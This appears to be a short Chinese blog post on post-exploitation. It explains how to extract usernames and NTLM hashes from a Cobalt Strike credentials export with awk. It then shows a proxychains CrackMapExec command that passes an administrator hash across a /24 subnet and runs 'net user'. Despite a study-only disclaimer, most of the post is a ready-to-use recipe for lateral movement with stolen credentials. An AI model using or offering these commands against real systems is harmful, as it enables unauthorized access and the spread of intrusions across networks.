cobaltstrike credentials凭证解析提取

/ 默认分类 / 0 条评论 / 4293 浏览

本站的所有程序和文章,仅限用于学习和研究目的;不得用于商业或者非法用途,否则,一切后果请用户自负!!

前言

小记用命令直接提取cs里面导出来credentials.txt,方便进一步进行pth或者密码喷洒。

提取

注意需要把顶部的注释删除,如果凭证是包含明文的,需要手动处理一下。

提取用户名

awk -F":::" '{print $1}' credentials.txt | awk -F"\\" '{print $2}'

提取hash

awk -F":::" '{print $2}' credentials.txt

提取完就可以cme批量了

proxychains4 ./cme smb 10.0.0.1/24 -u administrator -H 31d6cfe0d16ae931b73c59d7e0c089c0 -d xx.org -x "net user"

本文最后编辑时间为: 2022-03-03

如本文对你有帮助,点击下面广告支持一下吧,创作不易,感谢大佬。

safe6